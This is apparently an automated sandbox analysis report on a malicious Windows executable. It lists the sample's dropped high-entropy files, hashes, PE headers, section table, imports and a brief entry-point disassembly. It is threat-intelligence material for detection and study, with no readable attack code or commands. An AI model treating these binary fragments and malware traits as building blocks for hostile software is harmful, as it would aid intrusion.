                                                                                                Preview:{"ramdIc..,0.^.....9....w..1....H...J.y.(...Xk...,JG...`E..H7...d..H.M....._..9...frqF........-.\@.N,g.8L8.......<U.O......iQ...6Q[..A~..y....P..U.lQ....a....p..^-...;i.J.G....T..uB...*...+..O.9..q..`..S..n....k.f.w.g..)...$j..!..U..V...T1.~..D...{..u..d.*.k...i..[...n...0...D....8x.%......f.V3..K.n%.n...i4.JXY}R...y...P.m....o.o`.>.#.....KB...Y..<..L.6k..dhm....ax..0p.5:?.p..r.......4.a..M.".-.......Y..EcP;..|k.6".BzoCC.>.....X..e..Pt.r.q.+....D|H..E.......27..h,...RLveU.4b...3.J......;.iA8..E....w.A.O..iVG...u.G.....&...#."....z.!.w...OH|.UH...Y......X...*_.Tr}.(p|..7.4....d...6C..`..hMR3-$...r.d....m;...iB...m...$....L][...^....?].b...A.o.9.*.A..C.H)N.&.$<.o..)..!..l................\............K....U....%SN..L2.3....G.7.!w.....?.zCW...3r.--c..p.PZ....n.....v.-T....0%.IH..G..Cu,.&.G....9.nW.$..i...{../.N..E.vk'...dIZ.>:.a>Dq......8F.9G.9.x...q...Ci.b..3g..W.Iy"_O.w......Y..<z..;.l{..#3..%..t.g.\j.L.6..P..F.oQ..9e.>........
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:MS-DOS executable
                                                                                                Category:dropped
                                                                                                Size (bytes):42164934
                                                                                                Entropy (8bit):7.947664446230851
                                                                                                Encrypted:false
                                                                                                SSDEEP:786432:GwQNeYDxVRrMPJy7LVV4NDDmdrZy9wOtg5gGOdjtjSNu4GIluUNj56I596:/QcWxDMPnN+dk65gGUjku4vNjLj6
                                                                                                MD5:E4630319C215B195807CFA5393486323
                                                                                                SHA1:B4E936266956DB42CF152914B1DD5C84B74E3BD7
                                                                                                SHA-256:F4F755BF18E83FECC356D2CA145171A73D4E8037A6D25E379B88AA90B2CC78E3
                                                                                                SHA-512:7DE7BA63D856B81CCBE2D3BA234ABC4E3F551280C86E0152E15EA459317ED6DB9B3218F72286C8DC2E275A313EEED311C7B56E4DB71AE54C62EB4C9003EE4EB5
                                                                                                Malicious:true
                                                                                                Preview:MZ....n..q .e.4.....I.Fta?..^.!..y....o..l5za..C..YQh....K..7........p..[|.].y0.............V..)%b.X.n...-.........U..-.....d...}...g..f>.^3..ex.......F.... 6..-.K...U..;)v.....f..*.p>_...c....IZ.}......1....x.`..e..m......h.....RF.6....i..yAVr....9.....[...H..[{.MV........$..Pm.."..~)....A.X.<"g...-...+m...~.|.....],n^+.O>uxst........^..t....../p.O..HEu..Q.....=C..p.U..t.J-6.\=....<...b.N.....p... ...z..J.|..az.7}K.j.^.yW.4...'.=/;.+J.e..V.n%.....5.2. .$..A..`....;=wm..5.....`....cv..z.E.U.o.O.....YX[X.5..cO..".v.3.O..`!.c..z.MP&i....dEf~.)s.l...C..v.5.JpE...op..r.5..JF:...........J......-.x.H.... .....Np.....i.s..'.S;..:...."L....t.H{M.r.W.....%.q..'...5$..Lj.=.....z.].GV.<..},..d....`.n.....Bo.....2^...Br....E.s..t3J.C..$.6.$.t L]t.9.P|{ ..*.R.....Z<..~..."&.V.........6...J....n...$.b.....}.5.u.. ..VB,M.9..L..!....q.G.A&.]:m\.....q.u'.$g<....LL.=.9..*.*..*...f!......L.6...< 6..?.I.4...G...}.......K"..If.YB..1.#.^. .W..$..~..K.?.7uI....
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1031
                                                                                                Entropy (8bit):7.791756304816032
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:tGBTCnMjEZ4L7I7GRN7tmMj9h36/lf8SaaVOqj5D5x3bD:kBTCMjRI6RFwMRJ6/lfHOM5fLD
                                                                                                MD5:DA3CDB8ACA3CC24E8E6AA281CE3D8913
                                                                                                SHA1:2CB58AF6A062909BBABB16AF1D85A90E25983316
                                                                                                SHA-256:70B86291F6A2B0430EF4753714542CC03A92E0734CFF649A6E9B318E8A0D7396
                                                                                                SHA-512:B040DF0EE46FED129109C9608E9E8C5E083E8244F52C5E08A21219E0BEF601415E58AD6DB64C131C071968901642FE57D05770860FEA9BCB9139FB9CADFFA89D
                                                                                                Malicious:false
                                                                                                Preview:..[*W.2.PU......@..^.`.7.h.b..~...BnXs..mOX.-HY.....v..J..+q..ya.V1*9...Y.E._$....zF.. ..]o..Ex..z}0.Zx..I..O....V%R....."..?6.v2=..f..zl%h.....r_.;%..I.7|n....Dg4"..%RIr...nKr.u.3.}.+.kD..V.4..........H.gsz3.....?..z.....`.5....'....z.A.[,.0.....3.d.D.o.k.C......}}.ti,..%=..`..JJ.>.l..6.K..N.'...|.zk..]..k...y.. )........$oL.}....^^...D{.g..wZ...v...':..k.j....&^.M...I...f(...RH.....b......tR..)..x.<3.....3.....E........E...&.\.....P..e....9.%.....#.&.`.......0.L.....Y.....w;w&J.M..._.d..z..\.#Sl.....olD....m..F..S..Z)T?.MJUQ.@/.c..cc...`....0 [on...dD...}..{. .H..`...{j.>..$#...FJ...cA0.Z....G....u...u..T[.q..,83.....-...Yn.......VL.D..l.A62{.c.{..d.yO.eo..J........sE.{.........m.}.z.(.....[.Ib...@T.?."p...GK%..#..o.j,1.;.bf.r.l..2..?q~.B_j...$....x&..]}.#....(|...2.ho.`......?u.......Y...(......-kP.O5.m.}{x.o.v.PF.%......o....b<..0T..Wr..s.{%....z.".n.Z..-......T<..."..&.9q...z...:..r/...i.....BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):6130
                                                                                                Entropy (8bit):7.970611337045222
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:MXLHEw2dAOyTS/LynqY3wSj/jc4fUjcQ7wqfc0YsScO9iq01nJGylkJFnatERkeI:1RgS/LyqY3Tj/CZfcbsy01ngnPRkeiDH
                                                                                                MD5:C0725FF5F959FBAF236BB43D440FA754
                                                                                                SHA1:B17E9E2180A783BE22108BBF124B2FEBCC2F2874
                                                                                                SHA-256:A1606011616C4C96D30A8C2EB2C7679E14061B88E56F37A57E32547A26306597
                                                                                                SHA-512:AA0B1AFE96228138CE34D7662C0041821567A7B42C9D6D3A0519BED4103028A197139A31D401FA9CADADC7D64AEFFB8D35A90EA507D8C65B5DDD00859BEE3FE4
                                                                                                Malicious:false
                                                                                                Preview:.PNG......g..z"..bO...%.Wl...;..L.e0....^.+..;.K_.S......!k[....%..4...jOv......u.<..e:..1zv.c..=.5...<s$I.a....\.Xg.........v.y.3.,..._.......>...L...L.-.G.Nj..^.>....H.......EvnnV.!@.5P......r..?A..d......o-...k.*...bI.).Z..b......w.;:.d..&.?.>...I5.,OE...5@.z.N.kUd.^..S=..y.KO.M...l?.......rw.+0.W.=T....iCa=R....o...i... i.............bCfu.o...]..3.XQg.[....m.[.Mi...Q[........M.i..tZ1.....U..@>...O...%2...mC.h..UC......Fk].?....o4..x....}......<...~u.F....?.._.. .*...."`j.P.d...."...;.>...C......*.a..lX...6.X.o.M...9.$......=1#.!.W..Sz..8....%...Ii.)..eoD..y.....0..pp.VwBV......5...5xl..H._..X)...5.......b..'YQ....z.......E1..2..Qzz.Y...}nP...^8....y4...(.........b.N..'..V.t...Ln.-...T?../ph...,&G..g..`.Q2....e....P...t^....O..H.hTk.0D...q.{....3..K.TIc...++.)P.S..P.K+...bO..(.......J..;r.<.Tb.jc..j.ov..AZ...T..T...l.T.....Z...PMT.3..T.a...3...5..l..*...a.0.t...ho......T..d..$K.N..ak.A.......#{.kTq.?>...Dn6d..b}Dr9..]qY<....
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):6130
                                                                                                Entropy (8bit):7.97228548278529
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:3WcIzsWkyGbe4buiN+mxJ3d3MYh0D3ae4cm+K1jkQfhmeo+PHofvHnmD4PnlwKWF:izs5H6yxJ3d390ue3KwQfZHYeDsjQ
                                                                                                MD5:098059D430B885D16BDD5B6377B67E4A
                                                                                                SHA1:0D6D3BA35A4CAC492088F8BDE1019AE3B429CF5E
                                                                                                SHA-256:85B73119F1E7037954C7B521842D3D20C0CC9ADA529DEE55E5BC4A3703DE9F86
                                                                                                SHA-512:F5B4DCC6DEACC796067CFCE0D24268DBC67D456310E6E54D7D9C6B4BFC47C26F3FEAFA7F364C4C82AEAA44F897502966E7C6E1E0E5D6AFF73CC0F8462E68A02D
                                                                                                Malicious:false
                                                                                                Preview:.PNG..@t.]*.W.A.....H....ew...H..{..C.k{+p;.;.;6.o..q&..oc.....hw.P...<.s..M.../.]vt...".Q.X...a...S..t..[.W.[.K.;t.u.?/f=....Vf;.C..m.....k..8.......2Z..b...../W.X%..&q.o2.~ .!l..' `n*dW.l.0J.s.!n.........G...?.....h_.1.....q.fh..";..#v.AQ...E. .e...!\....o.F.].*....;....".5r'.;...BUxg..o.k.{.*...a.&%`./)[....3"mA.?$V..O`....].Cu.1.^.U..jI>.I.p8.m.4...LW_@.K80d.now..[.Y<s..&.a..=..@.......]c..$.ivA.e7;.....D....u.Q.w.....9hb...'....=...X..%.c#.vGMk.e....J...Z.}.H..U....[fpb...@j..u^....A....)h."..>1Mg..n.&../....%(...OC..x.'.a....]{A...b...G.........Zu..9....e.-..D..7^.n;..ntG."e..J..^..s..SS....&..l....$.I..........!?.{.:.s..R..<D....hL.H.j)V....v....!.S...v_...E.}.=P..i<'..@:2......A..ix.`..5M.1..=2...O...+".....\..Z..$...C.;..Q......\I....&:=qO.....7z.......X..$.=P.....G.i.bq\....t.-L.1".....=..L........;B.ZDQCA.b#2_.k......y.........n..B.]>..4.<H.Q...U...-/.,F......[(./Q..k.n...)....K.4...a.....R.Q.WWbs].4z.\...6......}\...p.ZX`./...<X.`.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):6130
                                                                                                Entropy (8bit):7.96495795123903
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:co71an/yoPTu9PR3mcImVLii+PgRzFFYXKsXJ/ChofcjoImuplGQ/zfuUpmHHiRQ:cocnz6PNmc3LjxFFLs5/ChHkIxGsyFH7
                                                                                                MD5:AA7FE1CD72A793474415375350A11C62
                                                                                                SHA1:D27745B7610A762615138D01D9609AEE3ACC69E6
                                                                                                SHA-256:F4E966C9251432AA1EC92F63629325927DEFED4DAA640D750A69F99365AAAC62
                                                                                                SHA-512:3DCF6C81621411F3844F05FCD94361B997264777EAE9D30BEC1AA94E0AF747B0D7523DC0471A73F5D156A0EB02B12D81BC0DB9F9CBBBCB8D7841877467694B0C
                                                                                                Malicious:false
                                                                                                Preview:.PNG.,.G....."..@.Z\.Vz.oc.*..|.~...c3........(...j..G..XD,AfP.qg.....,R...j@.k..Z.....cH.^..Ki&'.<.....O|....t....u.'&........F....4.SQ5I!..E.....].UxH.}.P.!........o.I~:K..?..(..zw.L........U.l.Q..7x]f........3.a.^).R.G....t.!Q.~a.Fe...E&.j..H.o..Az.j<..Im.Y.....<..n3<..|.w......M..]i.~%.].8.....?y.3vzc.....i~..e..........q5.:...;PV..(.<K.B.7..a@<..@6:1+.....-..E...6...O0...C~..A.L...s.d.p...+.".%.'2.....o.H..r...E..u.F.5-.2d.t..l8E...C"?..FN...P.....Mu.I#.......X....7n" ...t.<K.-.,...._..D...../............6......$(#4c..U....P....6RlG.2...r.ZN.....8...oz"..I..;A.l4..?.V>8.........L\.-\.i..7.<TH....%Re?.}..$..).........m..3./@}....0.._....:2..^.Yl.e..N.....fo..Z.&,u.#.No...#.....[[.D=KK?..p-.H..H...D}.......g.g.B....$..tg.8....E\I.t...;..`%.TB.w.G..I....I^Pfc...{u.|..........X.....w.rR..*.{.%.2hz.....O..d.J..L.XHgN..uDwex...I..s...|.R........h.+(I..Y....w....L6.....\~Sr.?.fY....?.^.....v..D.2e(.D^..Z.=..L...^. tc... .P.qi.G.......+>.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):6130
                                                                                                Entropy (8bit):7.968027131950292
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:BXrIhfqVciEsaWZAkmZkj/hkkchDKlb5ZKHY/a1tugmPGvfmvVmD95OJj1t:BXrhEsXCk5DcQKHLzugmPGocvs
                                                                                                MD5:F27CD025D406BB68F6943F80351A78C2
                                                                                                SHA1:2D45BE0D8D5543E6F120DA0CCBEE4B44528CA559
                                                                                                SHA-256:BE703808B0ECBADE051AF5E3D933CC9C1B1C4B1EB39DE9C4452B4014529B5F5E
                                                                                                SHA-512:63199406CCEF42BC19101CEC8BEDCB510C032CA4841127C72679C769D5336299E8D3F40008DDEB8DE1CEFE933824B6A3E0CBEAD16E72255AF7EC62B8507147D8
                                                                                                Malicious:false
                                                                                                Preview:.PNG.~1Py..E.y.Fk...3..wb4../n....I..05..1.`.{..`.Bc..k.T...Q....~.......~..NxNU..s..*...GI..9..6&..'..Q."...A ...sA,a6..F..*XH$%/&z...,>.R...3RR...}(....,.V...N...x.xwS......)6aZS.O...LM...'.kp......S`.%..]..)g..Jh.J.t....&.H...) ..>kj2...?l..p....pI..+...U.....8.8..../N....p.f.y.uM...s....pJ;P.....$1'.k.h.$,.Qe!y.g.(..KU.y...!.R......wp..14.:.on.R.3.....3...3.*...@.8.C....{<f...+}K..7$...-.Z.xc...>.xjH..Y.J2.cQ...o...Q...w........T.rkR.&...[@ ....O........,...\uS_..;W...\..EQ...3.t.].u.m.g.M.....@o...z..,.......R.m...W.....%....s.....D.(........F....P#>.(...4/.$T"$;|...E1r../1\X..3..;..w.8...(K....f.W....>J.._..p-H.......6h..!nW|Y........+Y...9Y....v..(k\y.jW..0B...n.h.r...=.......I.V..q..A6n..u........:...|.e.v....F..16YK....c....(..........}D.8S..P......R?XD.z.@e.T6.!I..C....s.K.!+.D...........0....>.U.>...&Q.Nov...t....D..c...Y,*;.!.....I.....r.V9.......8.........T...|..$.5.{.8.,h".........o.........`F..f....i.45.._h....Jv4.B.I..(.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1243
                                                                                                Entropy (8bit):7.8321978943141985
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:gAft3ysvMk79YACuSi7FiltogZVotZyWCvHzbYrxZ5gx3bD:gazlhmNiFily/7yBvTULGLD
                                                                                                MD5:2AA12E5934F40F773FF3C317A03721BB
                                                                                                SHA1:515CEEA8CC7C27724CE035718602A386639F74A5
                                                                                                SHA-256:88A4A13F36D302777463C65C77F99D2E1874835F9DBC9467E1C2CCB733113B4A
                                                                                                SHA-512:DE0A8FC247ACD97EB744BF89757CE699E7F957FCAB117812E18491ACED76E6295BD83557B5BC9532FCC5F1B60F07103A991F0918413B00382A936AEA3698ADF4
                                                                                                Malicious:false
                                                                                                Preview:<!doc.n6R.....vt..e,.T.'.$......O..~5..G...T.`....,.H.....d.\...4b........Q.b..A..%..$-M..>b...1.....BWp..b.......G...iT./..:...*.=..k.<r.L..~.J'...y\.xw...S._O.+..q.n.....E..#0;[V.M....[..Q.t....01.B-...!^.........j.D...(..o.L.0:....y#...x..-j...?|F.[.e.@..9...T.K%p...Y.N..JJ.'....M..*..`b.^.l6.?./cI..I.{L0... .m...Vj..x\..&.t..}.skd..Dz.-w.Y.<.....(.B.=..m\Y...ip.Z.`.s....g..|..d.I..[.k.j...9..G..E..|.6......)......O.D...0.@A.kMQn....']>.....=.2Z....7.LE..C.iZ...Y66......vx.......|..n...*9 #...(..f-..,.....L...c...E'{.. ........*..G............F......@/.]P....N...q.Q.aLg..;...n..NT....e8......\vd..xK......t.^....."li.....(.......|....D.E2@s.....e..+.....p.....$.....]..7Z.t.D........d...tZ,. ..eu.#.4(..f....u.;.z[...z\8^:.;.@(..G].L`..pn.IN.DZ..........:.lLn.w|.jUX.........t....T....Q_._...d...0....72.qv..OD<..."...c.CS.'.....#/s..D...k./.f...<a.....4].8l.7&...G..$......i....R.}s.`Y..n.5......>..7....eR...b....-..<v..e.....c....9E...
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1193
                                                                                                Entropy (8bit):7.810273563487521
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:1lUHSzm6tH//Wi0ydK5PLEDuEtu2dpfjSTw1vC7u0L5mx3bD:1lUyfV/d0yK5DEXdhj41F1KLD
                                                                                                MD5:B4AE0DEE448908867683A46E57C7D69F
                                                                                                SHA1:F889F688FB053BD1FEB247F4B8B11A85C2109CD7
                                                                                                SHA-256:96860DBEDA88DE97B926352A8C746840AD3C5126D1DBD85BA7E0303384118BC3
                                                                                                SHA-512:7493DA044F0AFCBF16F59B8AA8A0E6EFB5935E1D2ACA3EDB4FE1AF868F2F118D24E88E056FD3AC9273F79B9B435EABB7D58A2A568B7914F44434A899CAE5B8AC
                                                                                                Malicious:false
                                                                                                Preview:<!doc...N.(..Q.X/1.}(.]/:wF.....{j9b..w..c....v(To.Sn .....2D..c.!....d..'`q.r..e.". '.2.}R..Q1...P.4....@.....'$i.`:D..w....`\...UZ.96.bA.......M9.p..&.......H....n.>...o...g...3....hQP..mp[3!..,|...1.k.0)....}E...up}....r...].pL...|.^n]..).x2v...ap.0.....]..,1..I..LP.)9..JA...j..$.5.h.R...{1Rl.{V>)I....wq[:.>..ie....!...e.&.L$6.q.;p8r.....uj.E.........)1/mH..-.@i2....O.....y.k......g..R....Zr(...l .3.j.C...^.....~Z...g...5.o.pQd..HZp.......'&...0..!.....t.B1f-.P.zi..b$;.N.h...7..\..j..T..p.2..b......E..MqK..@......D........&.A...Za.%......c.....g....l........I..>M...b...<..E..i).R...>8...l.Q.U..q-.=l.}.6...!V.D...b....c.`S:..p..Z18r....#.y.m.Q.U.f{.Z-s.B.b.......-.o.#&&......}.qi........|]...c;C....v........$.!JK..n.x.....C..A.Za.P.vt..Q..#"f...&..h...d..B.i..g.O8..x.......$......A...M~j..*...;..s(x~....{!. ....H_.S.;..G[`..S...Z...-C.....5..|\6....D N#....`+....4.:O_8.Q...w.z.b.yykCMMM. ...1...SV.o`..SS}Q.d(eb).GyL[..Q..m.....
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:MS Windows registry file, NT/2000 or above
                                                                                                Category:dropped
                                                                                                Size (bytes):1835008
                                                                                                Entropy (8bit):4.462955177012559
                                                                                                Encrypted:false
                                                                                                SSDEEP:6144:eIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uN2dwBCswSbn:zXD94+WlLZMM6YFHg+n
                                                                                                MD5:D1CA19234683C488FFD2C1DC0990A0E9
                                                                                                SHA1:FBC1966E4ABFF605A5EEAA572CA2FE53D5722397
                                                                                                SHA-256:CF9423BC2ED58CF5D4453BD26C361C625E56B06FBA5236F481308AB999C2937B
                                                                                                SHA-512:E80A22C3B14F28A89B081163D973EE9A74C4A91662B0B6BDF930CCC0665621B0383F3807812CB0183DDC0C532C5F359B59F85EAF90C93DA5880A57E6D3DEB58A
                                                                                                Malicious:false
                                                                                                Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm....O..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Entropy (8bit):6.657266362346896
                                                                                                TrID:
                                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                File name:baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File size:1'150'976 bytes
                                                                                                MD5:5cacd6f1b5cec25f3f0b0b3c4d5807d3
                                                                                                SHA1:41b8851bc57462502b0113ee1f2579dff5d94f4f
                                                                                                SHA256:c73cb93ad9ad6d003b505ce2b960d75467ad612786e0559c74dca18426fb9400
                                                                                                SHA512:7d46037825e5f34f02105c45ee05e03e4c2d7e73889a43c4e47704e27e563cae63f5d0dffb01a2d628ad0b3962e31cebf44dbed5892b6e1a995c45ee2c0714b4
                                                                                                SSDEEP:24576:ZBUIKn/vwOXGUXAjCymYZiVtElVIBT2roqnTSSxWeT/dRPOO82WQHUq7:F0dwAYZt6C31WeTVRPOh27Uq7
                                                                                                TLSH:2435AE02BB819171E5D341BA0DFE977E883AA9A0933A95C3D7E91C568E306D0673F3C5
                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......(O..l...l...l.....7.f.......+/..*...h.....9.m...../.m...a|..Q...a|7.s...a|........&.n.....8.n.....#.M...l...........d...a|3.m..
                                                                                                Icon Hash:90cececece8e8eb0
                                                                                                Entrypoint:0x424141
                                                                                                Entrypoint Section:.text
                                                                                                Digitally signed:false
                                                                                                Imagebase:0x400000
                                                                                                Subsystem:windows gui
                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                Time Stamp:0x5D890137 [Mon Sep 23 17:30:31 2019 UTC]
                                                                                                TLS Callbacks:
                                                                                                CLR (.Net) Version:
                                                                                                OS Version Major:5
                                                                                                OS Version Minor:1
                                                                                                File Version Major:5
                                                                                                File Version Minor:1
                                                                                                Subsystem Version Major:5
                                                                                                Subsystem Version Minor:1
                                                                                                Import Hash:0c756c849bc7b459f78f7a5ce46cd4a7
                                                                                                Instruction
                                                                                                call 00007FD98CBD8F52h
                                                                                                jmp 00007FD98CBCAC4Eh
                                                                                                jmp 00007FD98CBCAF6Ch
                                                                                                push ebp
                                                                                                mov ebp, esp
                                                                                                push dword ptr [ebp+18h]
                                                                                                push dword ptr [ebp+14h]
                                                                                                push dword ptr [ebp+10h]
                                                                                                push dword ptr [ebp+0Ch]
                                                                                                push dword ptr [ebp+08h]
                                                                                                call 00007FD98CBCAFABh
                                                                                                int3
                                                                                                push ebp
                                                                                                mov ebp, esp
                                                                                                sub esp, 00000328h
                                                                                                mov eax, dword ptr [0050AD20h]
                                                                                                xor eax, ebp
                                                                                                mov dword ptr [ebp-04h], eax
                                                                                                cmp dword ptr [ebp+08h], FFFFFFFFh
                                                                                                push edi
                                                                                                je 00007FD98CBCAE1Bh
                                                                                                push dword ptr [ebp+08h]
                                                                                                call 00007FD98CBD96F4h
                                                                                                pop ecx
                                                                                                and dword ptr [ebp-00000320h], 00000000h
                                                                                                lea eax, dword ptr [ebp-0000031Ch]
                                                                                                push 0000004Ch
                                                                                                push 00000000h
                                                                                                push eax
                                                                                                call 00007FD98CBD2093h
                                                                                                lea eax, dword ptr [ebp-00000320h]
                                                                                                add esp, 0Ch
                                                                                                mov dword ptr [ebp-00000328h], eax
                                                                                                lea eax, dword ptr [ebp-000002D0h]
                                                                                                mov dword ptr [ebp-00000324h], eax
                                                                                                mov dword ptr [ebp-00000220h], eax
                                                                                                mov dword ptr [ebp-00000224h], ecx
                                                                                                mov dword ptr [ebp-00000228h], edx
                                                                                                mov dword ptr [ebp-0000022Ch], ebx
                                                                                                mov dword ptr [ebp-00000230h], esi
                                                                                                mov dword ptr [ebp-00000234h], edi
                                                                                                mov word ptr [ebp-00000208h], ss
                                                                                                mov word ptr [ebp-00000214h], cs
                                                                                                mov word ptr [ebp-00000238h], ds
                                                                                                mov word ptr [ebp-0000023Ch], es
                                                                                                mov word ptr [ebp-00000240h], fs
                                                                                                mov word ptr [ebp+0000FDBCh], gs
                                                                                                Programming Language:
                                                                                                • [ASM] VS2013 UPD5 build 40629
                                                                                                • [ C ] VS2013 UPD5 build 40629
                                                                                                • [C++] VS2013 build 21005
                                                                                                • [ASM] VS2013 build 21005
                                                                                                • [ C ] VS2013 build 21005
                                                                                                • [RES] VS2013 build 21005
                                                                                                • [LNK] VS2013 UPD5 build 40629
                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x1085d00x154.rdata
                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x12b0000x1e0.rsrc
                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x12c0000xa32c.reloc
                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0xcc4600x38.rdata
                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x105ac80x40.rdata
                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0xcc0000x3f0.rdata
                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                .text0x10000xca5bc0xca6009d3505098e4eee3dc361c6bef0b26b98False0.5030461029184682data6.570129941575212IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                .rdata0xcc0000x3dba20x3dc00f19ff983c6336630532093d9713707ceFalse0.3958003858805668data5.668482952815905IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                .data0x10a0000x203580x6400b9cff45acba0bf73d16290994acd3da3False0.4978125data4.939624310736174IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                .rsrc0x12b0000x1e00x2009c3280f335e8e346ce925599d24fcc62False0.533203125data4.7176788329467545IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                .reloc0x12c0000xa32c0xa40024f3bb349067df95682b9a6026a53082False0.6199980945121951data6.612523450234696IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                RT_MANIFEST0x12b0600x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727
                                                                                                DLLImport
                                                                                                RPCRT4.dllRpcStringFreeW, UuidCreate, UuidToStringW, RpcStringFreeA, UuidToStringA
                                                                                                MPR.dllWNetOpenEnumW, WNetEnumResourceW, WNetCloseEnum
                                                                                                WININET.dllInternetCloseHandle, InternetReadFile, InternetOpenUrlW, InternetOpenW, HttpQueryInfoW, InternetOpenA, InternetOpenUrlA
                                                                                                WINMM.dlltimeGetTime
                                                                                                SHLWAPI.dllPathAppendA, PathFindFileNameW, PathRemoveFileSpecW, PathFileExistsA, PathFileExistsW, PathAppendW, PathFindExtensionW
